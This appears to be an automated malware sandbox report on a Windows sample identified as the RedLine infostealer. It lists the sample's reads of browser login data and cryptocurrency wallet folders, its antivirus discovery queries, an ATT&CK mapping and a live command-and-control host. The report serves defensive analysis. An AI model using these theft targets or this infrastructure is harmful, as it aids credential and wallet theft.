Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\4JL966sxM4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\4JL966sxM4.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\4JL966sxM4.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\4JL966sxM4.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\4JL966sxM4.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\4JL966sxM4.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\4JL966sxM4.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Source: 4JL966sxM4.exe, 00000000.00000002.339880215.000000000681F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4JL966sxM4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.4JL966sxM4.exe.c10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.267805940.0000000000C12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4JL966sxM4.exe PID: 7004, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\4JL966sxM4.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\4JL966sxM4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior

Source: Yara match	File source: 4JL966sxM4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.4JL966sxM4.exe.c10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.267805940.0000000000C12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4JL966sxM4.exe PID: 7004, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4JL966sxM4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.4JL966sxM4.exe.c10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.267805940.0000000000C12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4JL966sxM4.exe PID: 7004, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	221 Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	1 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	1 Input Capture	11 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	231 Virtualization/Sandbox Evasion	Security Account Manager	231 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	123 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
4JL966sxM4.exe	100%	Avira	HEUR/AGEN.1305500
4JL966sxM4.exe	84%	ReversingLabs	ByteCode-MSIL.Infostealer.RedLine
4JL966sxM4.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://tempuri.org/Endpoint/EnvironmentSettings	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnect	0%	Avira URL Cloud	safe
http://jul-nelson.gl.at.ply.gg:47198	100%	Avira URL Cloud	malware
http://tempuri.org/Endpoint/CheckConnectResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnviron	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://jul-nelson.gl.at.ply.gg	100%	Avira URL Cloud	malware
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironment	0%	Avira URL Cloud	safe
jul-nelson.gl.at.ply.gg:47198	100%	Avira URL Cloud	malware
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	Avira URL Cloud	safe
http://tempuri.org/04	0%	Avira URL Cloud	safe
http://jul-nelson.gl.at.ply.gg:47198/	100%	Avira URL Cloud	malware
http://jul-nelson.gl.at.ply.gg:4	100%	Avira URL Cloud	malware
http://tempuri.org/Endpoint/GetUpdates	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	Avira URL Cloud	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	Avira URL Cloud	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	Avira URL Cloud	safe
http://schemas.datacontract.org/2004/07/	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/VerifyUpdate	0%	Avira URL Cloud	safe
http://tempuri.org/l	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
jul-nelson.gl.at.ply.gg	147.185.221.16	true	true		unknown
api.ip.sb	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
jul-nelson.gl.at.ply.gg:47198	true	Avira URL Cloud: malware	unknown
http://jul-nelson.gl.at.ply.gg:47198/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	4JL966sxM4.exe	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	4JL966sxM4.exe, 00000000.00000002.337522595.0000000004258000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004078000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000040C8000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000042A8000.00000004.00000800.00020000.00000000.sdmp, tmpFA58.tmp.0.dr, tmpFA79.tmp.0.dr, tmpC44E.tmp.0.dr, tmpC43D.tmp.0.dr, tmpC46F.tmp.0.dr, tmpFA57.tmp.0.dr, tmpC45E.tmp.0.dr, tmpFA35.tmp.0.dr, tmpFA46.tmp.0.dr, tmpFA68.tmp.0.dr, tmpFA9A.tmp.0.dr, tmpFA8A.tmp.0.dr	false		high
https://duckduckgo.com/ac/?q=	tmpFA8A.tmp.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	4JL966sxM4.exe, 00000000.00000002.337522595.0000000004258000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004078000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000040C8000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000042A8000.00000004.00000800.00020000.00000000.sdmp, tmpFA58.tmp.0.dr, tmpFA79.tmp.0.dr, tmpC44E.tmp.0.dr, tmpC43D.tmp.0.dr, tmpC46F.tmp.0.dr, tmpFA57.tmp.0.dr, tmpC45E.tmp.0.dr, tmpFA35.tmp.0.dr, tmpFA46.tmp.0.dr, tmpFA68.tmp.0.dr, tmpFA9A.tmp.0.dr, tmpFA8A.tmp.0.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.datacontract.org/2004/07/	4JL966sxM4.exe, 00000000.00000002.337006053.0000000003015000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettings	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	4JL966sxM4.exe	false	Avira URL Cloud: safe	unknown
http://jul-nelson.gl.at.ply.gg:47198	4JL966sxM4.exe, 00000000.00000002.337006053.0000000003015000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/envelope/	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfpf	4JL966sxM4.exe, 00000000.00000002.337522595.0000000004258000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004078000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000040C8000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000042A8000.00000004.00000800.00020000.00000000.sdmp, tmpFA58.tmp.0.dr, tmpFA79.tmp.0.dr, tmpC44E.tmp.0.dr, tmpC43D.tmp.0.dr, tmpC46F.tmp.0.dr, tmpFA57.tmp.0.dr, tmpC45E.tmp.0.dr, tmpFA35.tmp.0.dr, tmpFA46.tmp.0.dr, tmpFA68.tmp.0.dr, tmpFA9A.tmp.0.dr, tmpFA8A.tmp.0.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpFA8A.tmp.0.dr	false		high
http://tempuri.org/	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://jul-nelson.gl.at.ply.gg	4JL966sxM4.exe, 00000000.00000002.337006053.0000000003015000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Endpoint/CheckConnect	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	4JL966sxM4.exe, 00000000.00000002.337522595.0000000004258000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004078000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000040C8000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000042A8000.00000004.00000800.00020000.00000000.sdmp, tmpFA58.tmp.0.dr, tmpFA79.tmp.0.dr, tmpC44E.tmp.0.dr, tmpC43D.tmp.0.dr, tmpC46F.tmp.0.dr, tmpFA57.tmp.0.dr, tmpC45E.tmp.0.dr, tmpFA35.tmp.0.dr, tmpFA46.tmp.0.dr, tmpFA68.tmp.0.dr, tmpFA9A.tmp.0.dr, tmpFA8A.tmp.0.dr	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnviron	4JL966sxM4.exe, 00000000.00000002.337006053.000000000333C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	4JL966sxM4.exe, 00000000.00000002.337522595.0000000004258000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004078000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000040C8000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000042A8000.00000004.00000800.00020000.00000000.sdmp, tmpFA58.tmp.0.dr, tmpFA79.tmp.0.dr, tmpC44E.tmp.0.dr, tmpC43D.tmp.0.dr, tmpC46F.tmp.0.dr, tmpFA57.tmp.0.dr, tmpC45E.tmp.0.dr, tmpFA35.tmp.0.dr, tmpFA46.tmp.0.dr, tmpFA68.tmp.0.dr, tmpFA9A.tmp.0.dr, tmpFA8A.tmp.0.dr	false		high
http://tempuri.org/Endpoint/SetEnvironment	4JL966sxM4.exe, 00000000.00000002.337006053.000000000333C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://jul-nelson.gl.at.ply.gg:4	4JL966sxM4.exe, 00000000.00000002.337006053.000000000333C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Endpoint/GetUpdates	4JL966sxM4.exe, 00000000.00000002.337006053.0000000003015000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	tmpFA8A.tmp.0.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	4JL966sxM4.exe, 00000000.00000002.337522595.0000000004258000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004078000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000040C8000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000042A8000.00000004.00000800.00020000.00000000.sdmp, tmpFA58.tmp.0.dr, tmpFA79.tmp.0.dr, tmpC44E.tmp.0.dr, tmpC43D.tmp.0.dr, tmpC46F.tmp.0.dr, tmpFA57.tmp.0.dr, tmpC45E.tmp.0.dr, tmpFA35.tmp.0.dr, tmpFA46.tmp.0.dr, tmpFA68.tmp.0.dr, tmpFA9A.tmp.0.dr, tmpFA8A.tmp.0.dr	false		high
http://tempuri.org/04	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.orgcookies//settinString.Removeg	4JL966sxM4.exe	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdatesResponse	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdate	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/l	4JL966sxM4.exe, 00000000.00000002.337006053.0000000003015000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpFA8A.tmp.0.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.185.221.16	jul-nelson.gl.at.ply.gg	United States		12087	SALSGIVERUS	true

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1311061
Start date and time:	2023-09-19 21:06:15 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	4JL966sxM4.exe
Original Sample Name:	b83c75e00f5f8d62de662451b631278b.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/27@5/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 96% Number of executed functions: 107 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.77.172.139, 172.67.75.172, 104.26.13.31, 104.26.12.31
Excluded domains from analysis (whitelisted): www.bing.com, geover.prod.do.dsp.mp.microsoft.com, client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, kv601.prod.do.dsp.mp.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target 4JL966sxM4.exe, PID 7004 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: 4JL966sxM4.exe

Simulations

Behavior and APIs

Time	Type	Description
21:07:35	API Interceptor	150x Sleep call for process: 4JL966sxM4.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
147.185.221.16	explorer.exe	Get hash	malicious	RevengeRAT	Browse
	explorer.exe	Get hash	malicious	RevengeRAT	Browse
	guru.exe	Get hash	malicious	XWorm	Browse
	Bc7MjdRbnb.exe	Get hash	malicious	Njrat	Browse
	SRqIAV24kb.exe	Get hash	malicious	Njrat	Browse
	6e.exe	Get hash	malicious	XWorm	Browse
	NPBTv0DflE.exe	Get hash	malicious	AsyncRAT, DCRat	Browse
	mods.exe	Get hash	malicious	XWorm	Browse
	XClient_2.bin.exe	Get hash	malicious	XWorm	Browse
	XClient_1.bin.exe	Get hash	malicious	XWorm	Browse
	XClient_3.bin.exe	Get hash	malicious	XWorm	Browse
	SmFhNMiO7V.exe	Get hash	malicious	Njrat	Browse
	v25211YRhT.exe	Get hash	malicious	Njrat	Browse
	XClient.exe	Get hash	malicious	XWorm	Browse
	qweroaoal.exe	Get hash	malicious	Njrat	Browse
	MnqdkghWu9.exe	Get hash	malicious	Njrat	Browse
	Bypass.exe	Get hash	malicious	Quasar	Browse
	Forcer.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	Forcer.exe	Get hash	malicious	AveMaria, Luna Logger, UACMe	Browse
	Steal.exe	Get hash	malicious	AveMaria, UACMe	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SALSGIVERUS	explorer.exe	Get hash	malicious	RevengeRAT	Browse	147.185.221.16
	explorer.exe	Get hash	malicious	RevengeRAT	Browse	147.185.221.16
	guru.exe	Get hash	malicious	XWorm	Browse	147.185.221.16
	Bc7MjdRbnb.exe	Get hash	malicious	Njrat	Browse	147.185.221.16
	SRqIAV24kb.exe	Get hash	malicious	Njrat	Browse	147.185.221.16
	6e.exe	Get hash	malicious	XWorm	Browse	147.185.221.16
	fTxjHavcYc.elf	Get hash	malicious	Mirai	Browse	147.170.50.233
	NPBTv0DflE.exe	Get hash	malicious	AsyncRAT, DCRat	Browse	147.185.221.16
	mods.exe	Get hash	malicious	XWorm	Browse	147.185.221.16
	XClient_2.bin.exe	Get hash	malicious	XWorm	Browse	147.185.221.16
	XClient_1.bin.exe	Get hash	malicious	XWorm	Browse	147.185.221.16
	XClient_3.bin.exe	Get hash	malicious	XWorm	Browse	147.185.221.16
	11V13r6Mm1.elf	Get hash	malicious	Mirai	Browse	147.184.134.130
	SmFhNMiO7V.exe	Get hash	malicious	Njrat	Browse	147.185.221.16
	6mI5kQBoEX.exe	Get hash	malicious	Njrat	Browse	147.185.221.180
	i9ESlnLxcB.elf	Get hash	malicious	Mirai	Browse	216.221.14.200
	v25211YRhT.exe	Get hash	malicious	Njrat	Browse	147.185.221.16
	rmnfnqCLAk.elf	Get hash	malicious	Mirai	Browse	147.170.50.245
	XClient.exe	Get hash	malicious	XWorm	Browse	147.185.221.16
	qweroaoal.exe	Get hash	malicious	Njrat	Browse	147.185.221.16

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2412
Entropy (8bit):	5.328840337306116
Encrypted:	false
SSDEEP:	48:MOfHK5HKIGHKdHKaJBTHaAHKz9eYHKhBUoPtHoBEImHKhBHKoHgHZHAHjHKoLHGr:vq5qzqdqIlqzsYqheoPtIBEbqLqoA5gE
MD5:	E82A337B2FF3246110C6EBB7D12129C4
SHA1:	A0E405F937E70576EB6E764E6001BBA507CDC15E
SHA-256:	C620A962A50E889AB19A5BA722858B0EAF539A3AD3DCD7C536E3985D3627B77F
SHA-512:	B7F2504A4C830E467A6AA8AF2AD409F2A09D245007FB5D74A1A98DDD54F14FE3FB3117DE3C174F410468A8BBB30847144EA58CE924B42F7BFD7260DDD32CEB8F
Malicious:	false
Reputation:	low
